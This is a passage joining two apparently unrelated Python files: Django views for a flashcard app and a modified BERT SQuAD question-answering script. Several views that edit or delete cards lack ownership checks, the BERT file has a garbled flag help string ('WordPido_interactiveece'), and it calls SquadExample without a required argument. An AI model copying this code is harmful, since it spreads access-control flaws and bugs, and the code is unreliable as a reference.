return render(request, 'Cards/edit_set.html', {'form': form, 'folder': folder})
@login_required
def copy_folder(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if request.method == 'POST':
form = FolderForm(request.POST or None, instance=folder)
if form.is_valid():
new_folder = CardFolder.objects.get(id=set_id)
new_folder.pk = None
new_folder.id = None
new_folder.user = request.user
new_folder.public = False
new_folder.save()
for multicard in folder.multicard_set.all():
new_multicard = MultiCard.objects.get(id=multicard.id)
new_multicard.id = None
new_multicard.pk = None
new_multicard.mastered = False
new_multicard.score = 0
new_multicard.priority = 0
new_multicard.cards_folder = new_folder
new_multicard.save()
for card in multicard.card_set.all():
new_card = card
new_card.pk = None
new_card.id = None
new_card.mastered = False
new_card.score = 0
new_card.priority = 0
new_card.multi_card = new_multicard
new_card.cards_folder = new_folder
new_card.save()
form = FolderForm(request.POST or None, instance=new_folder)
new_folder = form.save(commit=False)
new_folder.being_edited = True
new_folder.save()
t = Thread(target=edit_folder_translate, args=[new_folder])
t.setDaemon(False)
t.start()
# return redirect('Cards/view_set.html', {'folder': new_folder})
return redirect(f'/cards/view_set/{new_folder.id}/')
else:
form = FolderForm(instance=folder)
return render(request, 'Cards/copy_set.html', {'form': form})
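# Hedged note on the copy pattern used above: setting pk and id to None on a fetched
# Django model instance and calling save() inserts a new row, which is how the folder,
# its MultiCards and their Cards are duplicated for the requesting user.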
@login_required
def view_folder(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
enough = len(folder.multicard_set.all()) > 2
for card in folder.card_set.all():
if card.pronunciation == 'False' or (card.pronunciation == card.main):
card.pronunciation = ''
card.save()
if folder.user != request.user:
return redirect('/no_access/')
return render(request, 'Cards/view_set.html', {'folder': folder, 'enough': enough})
@login_required
def reset_progress(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
MultiCard.objects.filter(cards_folder=folder).update(priority=10, score=0)
Card.objects.filter(cards_folder=folder).update(priority=1, score=0)
return redirect(request.META['HTTP_REFERER'])
# endregion
# region MultiCards
@login_required
def add_multicard(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
langs = folder.get_langs(item='key')
form = CardsForm(request.POST or None)
context = {
"form": form,
'folder': folder,
"length": len(langs),
"langs": folder.get_langs(),
}
if request.method == "POST":
if request.POST['main' + langs[0]]:
m_card = MultiCard.objects.create(cards_folder=folder, comment=request.POST['comment'],
definition=request.POST['definition'])
m_card.save()
t = Thread(target=add_multicard_translate, args=[langs, request, m_card, folder])
t.setDaemon(False)
t.start()
# return redirect(f'/cards/add_multicard/{folder.id}/')
return redirect(f'/cards/view_set/{folder.id}/')
return render(request, 'Cards/add_multicard.html', context)
@login_required
def add_many(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
langs = folder.get_langs()
length = len(langs)
form = CardsForm(request.POST or None)
context = {
"form": form,
'folder': folder,
"length": length,
"langs": langs,
}
if request.method == "POST":
separator = str(request.POST['separator'])
language = str(request.POST['language'])
for_translate = request.POST['for_translate']
# Guard against bypassed client-side validation (language and for_translate are required).
if not language or not for_translate:
return redirect('/no_access/')
if not separator:
separator = " "
new_cards = for_translate.split(separator)
new_langs = folder.get_langs(item='key')
# Get all the languages except the source.
new_langs.remove(language)
for word in new_cards:
if word == "" or word == " ":
continue
word = word.strip(" , ")
m_card = MultiCard.objects.create(cards_folder=folder)
m_card.save()
word = word.capitalize()
Card.objects.create(multi_card=m_card, cards_folder=folder, language=language, main=word, synonyms="",
comment="", pronunciation="")
t = Thread(target=add_many_translate, args=[new_langs, word, language, m_card, folder])
t.setDaemon(False)
t.start()
return redirect(f'/cards/view_set/{folder.id}/')
return render(request, 'Cards/add_many.html', context)
@login_required
def edit_multicards(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
langs = folder.get_langs()
length = len(langs)
context = {
# "form": form,
'folder': folder,
"length": length,
"langs": langs,
'width': 94 / length
}
return render(request, 'Cards/edit_multicards.html', context)
@login_required
def edit_multicards_save(request, set_id, m_card_id):
if request.method == "POST":
folder = get_object_or_404(CardFolder, id=set_id)
langs = folder.get_langs()
m_card = get_object_or_404(MultiCard, id=m_card_id)
m_id = str(m_card.id)
m_card.definition = request.POST['definition' + m_id]
m_card.comment = request.POST['comment' + m_id]
m_card.save()
for k, v in langs:
card = Card.objects.get(multi_card=m_card, language=k)
if request.POST['main' + k + m_id] != card.main:
card.automated = False
card.main = request.POST['main' + k + m_id].capitalize()
card.pronunciation = request.POST['pronunciation' + k + m_id].capitalize()
card.synonyms = request.POST['synonyms' + k + m_id].capitalize()
card.comment = request.POST['comment' + k + m_id]
card.save()
return HttpResponse(status=204)
else:
return redirect('/no_access/')
@login_required
def edit_all_multicards(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
user_folders = request.user.cardfolder_set.all()
langs = folder.get_langs()
length = len(langs)
context = {
'folder': folder,
"length": length,
"langs": langs,
'width': 94 / length
}
if request.method == "POST":
# m_card = get_object_or_404(MultiCard, id=m_card_id)
for m_card in folder.multicard_set.all():
m_id = str(m_card.id)
if request.POST.get(('delete' + m_id), False):
m_card.delete()
else:
m_card.definition = request.POST['definition' + m_id]
m_card.comment = request.POST['comment' + m_id]
m_card.save()
for k, v in langs:
card = Card.objects.get(multi_card=m_card, language=k)
if request.POST['main' + k + m_id] != card.main:
card.automated = False
card.main = request.POST['main' + k + m_id].capitalize()
card.pronunciation = request.POST['pronunciation' + k + m_id].capitalize()
card.synonyms = request.POST['synonyms' + k + m_id].capitalize()
card.comment = request.POST['comment' + k + m_id]
card.save()
return render(request, 'Cards/edit_all_multicards.html', context)
else:
if folder not in user_folders:
return redirect('/no_access/')
else:
return render(request, 'Cards/edit_all_multicards.html', context)
@login_required
def delete_multicards(request, set_id, m_card_id):
if request.method == "POST":
m_card = get_object_or_404(MultiCard, id=m_card_id)
m_card.delete()
folder = get_object_or_404(CardFolder, id=set_id)
langs = folder.get_langs()
length = len(langs)
context = {
'folder': folder,
"length": length,
"langs": langs,
'width': 94 / length
}
return render(request, 'Cards/edit_multicards.html', context)
else:
return redirect('/no_access/')
# endregion
# region Public
@login_required
def make_public(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
if folder.public:
folder.public = False
else:
folder.public = True
folder.save()
return redirect(request.META['HTTP_REFERER'])
@login_required
def view_folder_public(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
return render(request, 'Cards/view_set_public.html', {'folder': folder})
@login_required
def public_sets(request):
folders = CardFolder.objects.filter(public=True)
return render(request, 'Cards/public_sets.html', {'folders': folders})
# endregion
# region Other
@login_required
def refresh_update(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
clean_errors(folder)
updates = MultiCard.objects.filter(being_edited=True, cards_folder=folder)
if updates or folder.being_edited:
return render(request, 'Cards/folder_being_updated.html', {'folder': folder})
else:
return edit_folder(request, folder.id)
@login_required
def repair_translations(request, set_id):
folder = get_object_or_404(CardFolder, id=set_id)
if folder.user != request.user:
return redirect('/no_access/')
clean_errors(folder)
t = Thread(target=repair_translations_thread, args=[folder])
t.setDaemon(False)
t.start()
# TODO add message that translations are in work
return redirect(f'/cards/view_set/{folder.id}/')
# endregion
# TODO If words are too long they need to be wrapped. Otherwise they are breaking the tables.
# TODO count folders by occurrence in that user folders
# TODO [learn_write.html] add auto-focus and ability to go next on enter even if no input required
# TODO [learn_write.html] add comments, hints, message-at least 2 cards are required
|
run_squad_ColabTCPTrans_quicktest_20191113.py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run BERT on SQuAD 1.1 and SQuAD 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import math
import os, types
import random
import modeling
import optimization
import tokenization
import six
import copy
import tensorflow as tf
import numpy as np
import scipy.sparse as sp
# do excel
from openpyxl import Workbook
import uuid
# do
import code
import prettytable
from decimal import *
import decimal
getcontext().prec = 50
#Willy Define
example_in_set_eval_examples = 0
example_in_write_predictions = 0
predict_result_index = 0
checkState_in_AtenResult = 0
checkState_in_AtenResult2 = 0
checkState_in_GetAnswer = 0
checkState_add_retriever = 0
FollowInitTPU = 1
willy_check_code = "willy test on 201911171804"
Disconnect_KEYWORD = 'Aten Colab Disconect'
from drqa import retriever
DOC2IDX = None
documents = []
#db_class = retriever.get_class('sqlite')
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string("vocab_file", None,
"The vocabulary file that the BERT model was trained on.")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string("train_file", None,
"SQuAD json for training. E.g., train-v1.1.json")
flags.DEFINE_string(
"predict_file", None,
"SQuAD json for predictions. E.g., dev-v1.1.json or test-v1.1.json")
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_bool(
"do_lower_case", True,
"Whether to lower case the input text. Should be True for uncased "
"models and False for cased models.")
flags.DEFINE_integer(
"max_seq_length", 384,
"The maximum total input sequence length after WordPido_interactiveece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded.")
flags.DEFINE_integer(
"doc_stride", 128,
"When splitting up a long document into chunks, how much stride to "
"take between chunks.")
flags.DEFINE_integer(
"max_query_length", 64,
"The maximum number of tokens for the question. Questions longer than "
"this will be truncated to this length.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_predict", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("predict_batch_size", 8,
"Total batch size for predictions.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_float("num_train_epochs", 3.0,
"Total number of training epochs to perform.")
flags.DEFINE_float(
"warmup_proportion", 0.1,
"Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10% of training.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer(
"n_best_size", 20,
"The total number of n-best predictions to generate in the "
"nbest_predictions.json output file.")
flags.DEFINE_integer(
"max_answer_length", 30,
"The maximum length of an answer that can be generated. This is needed "
"because the start and end predictions are not conditioned on one another.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
flags.DEFINE_bool(
"verbose_logging", False,
"If true, all of the warnings related to data processing will be printed. "
"A number of warnings are expected for a normal SQuAD evaluation.")
flags.DEFINE_bool(
"version_2_with_negative", False,
"If true, the SQuAD examples contain some that do not have an answer.")
flags.DEFINE_float(
"null_score_diff_threshold", 0.0,
"If null_score - best_non_null is greater than the threshold predict null.")
flags.DEFINE_bool(
"do_retriever", False,
"If True, use retriever to help reader to filte good doc - add by willy.")
flags.DEFINE_string(
"retriever_model", None,
"retriever model path - add by willy.")
flags.DEFINE_float(
"retriever_weight", 0.0,
"retriever weight - add by willy.")
flags.DEFINE_integer("retriever_ranker", 1,"Rank with retriever.")
flags.DEFINE_string("document_type","SQuAD", "There are three document types: (1)paragraphs in SQuAD (2)SQlite (DataBase) (3) Text - add by willy." )
flags.DEFINE_string("question_type","SQuAD", "There are three question types: (1) SQuAD (2)one_question (3) interactive." )
flags.DEFINE_string("question", None, "give question to predict - Willy Test.")
flags.DEFINE_string("db_file", None, "give path with data base file to set SQlite State - Willy Test.")
flags.DEFINE_string("question_table", None, "set table path - Willy Test.")
flags.DEFINE_string("excel_name", None ,"set excel name -Willy Test.")
flags.DEFINE_integer("show_all_choice", 0, "show all choice-Willy Test.")
flags.DEFINE_float(
"choice_score", 0.15,
"choice score. - add by willy.")
flags.DEFINE_float(
"threshold_prob_ans_merge", 0.5,
"threshold prob ans_merge - add by willy.")
flags.DEFINE_string("Host_TCPServer", '127.0.0.1' ,"Set TCP Host-Willy Test.")
flags.DEFINE_integer("PORT_TCPServer", 1234, "Set TCP Port-Willy Test.")
flags.DEFINE_bool("Save_PB_Model", False, "Save PB File.")
flags.DEFINE_string("EXPORT_PATH", None, "Path of export path.")
ranker = None
class DecimalEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, decimal.Decimal):
return float(obj)
return super(DecimalEncoder, self).default(obj)
class SquadExample(object):
"""A single training/test example for simple sequence classification.
For examples without an answer, the start and end position are -1.
"""
def __init__(self,
qas_id,
question_text,
doc_id, #willy add
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_id = doc_id #willy add
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "qas_id: %s" % (tokenization.printable_text(self.qas_id))
s += ", question_text: %s" % (
tokenization.printable_text(self.question_text))
s += ", doc_id:[%s]" % (tokenization.printable_text(self.doc_id)) #willy add
s += ", doc_tokens: [%s]" % (" ".join(self.doc_tokens))
if self.start_position:
s += ", start_position: %d" % (self.start_position)
if self.start_position:
s += ", end_position: %d" % (self.end_position)
if self.start_position:
s += ", is_impossible: %r" % (self.is_impossible)
return s
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def TakeThird(val):
return val[2]
def set_squad_examples(input_file,question):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
file = open("Output1.txt", "r")
document = file.read()
file.close()
paragraphs = document.split('\n')
paragraphs = list(filter(None, paragraphs))
#-----------------------------------------------
doc_tokensList = []
for i, paragraph_text in enumerate(paragraphs):
# paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
doc_tokensList.append(doc_tokens)
#-----------------------------------------------
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for i, doc_tokens in enumerate(doc_tokensList):
example = SquadExample(
qas_id=str(uuid.uuid1()),
question_text=question,
doc_id=DOC2IDX[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
'''
for entry in input_data:
for paragraph in entry["paragraphs"]:
for qa in paragraph["qas"]:
#qas_id = qa["id"]
# uuid reset by willy in 20190313
qas_id = str(uuid.uuid1())
question_text = qa["question"]
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
for doc_tokens in doc_tokensList:
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
print(example)
examples.append(example)
'''
#-----------------------------------------------
return examples
def read_squad_examples(input_file, is_training):
"""Read a SQuAD json file into a list of SquadExample."""
with tf.gfile.Open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
paragraph_text = paragraph["context"]
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position = None
end_position = None
orig_answer_text = None
is_impossible = False
if is_training:
if FLAGS.version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError(
"For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset + answer_length -
1]
# Only add answers where the text can be exactly recovered from the
# document. If this CAN'T happen it's likely due to weird Unicode
# stuff so we will just skip the example.
#
# Note that this means for training mode, every example is NOT
# guaranteed to be preserved.
actual_text = " ".join(
doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(
tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
tf.logging.warning("Could not find answer: '%s' vs. '%s'",
actual_text, cleaned_answer_text)
continue
else:
start_position = -1
end_position = -1
orig_answer_text = ""
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
return examples
def serving_input_receiver_fn():
feature_spec = {
"unique_ids": tf.FixedLenFeature([], tf.int64),
"input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
}
serialized_tf_example = tf.placeholder(dtype=tf.string,
                                         shape=[FLAGS.predict_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
'''
# Way Original
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=[FLAGS.predict_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
'''
'''
# Way1
serialized_tf_example = tf.placeholder(shape=[None], dtype=tf.string)
serialized_tf_example_1 = tf.placeholder(shape=[None], dtype=tf.string)
serialized_tf_example_2 = tf.placeholder(shape=[None], dtype=tf.string)
serialized_tf_example_3 = tf.placeholder(shape=[None], dtype=tf.string)
received_tensors = {
'unique_ids': serialized_tf_example,
'input_ids': serialized_tf_example_1,
'input_mask': serialized_tf_example_2,
'segment_ids': serialized_tf_example_3,
}
def _decode_record(record):
example = tf.parse_single_example(record, feature_spec)
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
return t
features = {}
feature_spec = { "unique_ids": tf.FixedLenFeature([], tf.int64), }
features['unique_ids'] = tf.map_fn(_decode_record, serialized_tf_example, dtype=tf.int32)
feature_spec = { "input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64), }
features['input_ids'] = tf.map_fn(_decode_record, serialized_tf_example_1, dtype=tf.int32)
feature_spec = { "input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64), }
features['input_mask'] = tf.map_fn(_decode_record, serialized_tf_example_2, dtype=tf.int32)
feature_spec = { "segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64), }
features['segment_ids'] = tf.map_fn(_decode_record, serialized_tf_example_3, dtype=tf.int32)
return tf.estimator.export.ServingInputReceiver(features, received_tensors)
'''
def convert_examples_to_features(examples, tokenizer, max_seq_length,
doc_stride, max_query_length, is_training,
output_fn):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index,
split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and
tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
'''
if example_index < 10:
tf.compat.v1.logging.info("*** Example ***")
tf.compat.v1.logging.info("unique_id: %s" % (unique_id))
tf.compat.v1.logging.info("example_index: %s" % (example_index))
tf.compat.v1.logging.info("doc_span_index: %s" % (doc_span_index))
tf.compat.v1.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.compat.v1.logging.info("token_to_orig_map: %s" % " ".join(
["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
tf.compat.v1.logging.info("token_is_max_context: %s" % " ".join([
"%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
]))
tf.compat.v1.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.compat.v1.logging.info(
"input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.compat.v1.logging.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
if is_training and example.is_impossible:
tf.compat.v1.logging.info("impossible example")
if is_training and not example.is_impossible:
answer_text = " ".join(tokens[start_position:(end_position + 1)])
tf.compat.v1.logging.info("start_position: %d" % (start_position))
tf.compat.v1.logging.info("end_position: %d" % (end_position))
tf.compat.v1.logging.info(
"answer: %s" % (tokenization.printable_text(answer_text)))
'''
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output_fn(feature)
unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
  # Question: What country is the top exporter of electronics?
  # Context: The Japanese electronics industry is the largest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
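# Illustrative sketch added for clarity: a tiny, self-contained walk-through of the
# "(1895-1943)." example described in the comment above. The toy tokenizer and the
# token list are assumptions for demonstration only; this helper is never called by
# the pipeline.
def _demo_improve_answer_span():
  class _ToyTokenizer(object):
    """Splits letters/digits from punctuation, roughly the way the real tokenizer
    splits the span (1895-1943). into separate pieces in the example above."""
    def tokenize(self, text):
      pieces, word = [], ""
      for ch in text:
        if ch.isalnum():
          word += ch
        else:
          if word:
            pieces.append(word)
            word = ""
          if not ch.isspace():
            pieces.append(ch)
      if word:
        pieces.append(word)
      return pieces
  doc_tokens = ["The", "leader", "was", "John", "Smith",
                "(", "1895", "-", "1943", ")", "."]
  # The annotated span initially covers tokens 5..10 ("( 1895 - 1943 ) .");
  # _improve_answer_span tightens it to the single token "1895" at index 6.
  start, end = _improve_answer_span(doc_tokens, 5, 10, _ToyTokenizer(), "1895")
  assert (start, end) == (6, 6)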
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
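# Illustrative sketch added for clarity: reproduces the 'bought' example from the
# comment above with concrete spans. The span boundaries are assumptions chosen to
# mirror that example; this helper is never called by the pipeline.
def _demo_check_is_max_context():
  DocSpan = collections.namedtuple("DocSpan", ["start", "length"])
  # Doc tokens: the(0) man(1) went(2) to(3) the(4) store(5) and(6) bought(7)
  #             a(8) gallon(9) of(10) milk(11)
  spans = [
      DocSpan(start=0, length=5),  # Span A: the man went to the
      DocSpan(start=3, length=5),  # Span B: to the store and bought
      DocSpan(start=6, length=5),  # Span C: and bought a gallon of
  ]
  position = 7  # the token 'bought'
  # Span B gives min(left=4, right=0) context, span C gives min(left=1, right=3),
  # so span C (index 2) is the maximum-context span for 'bought'.
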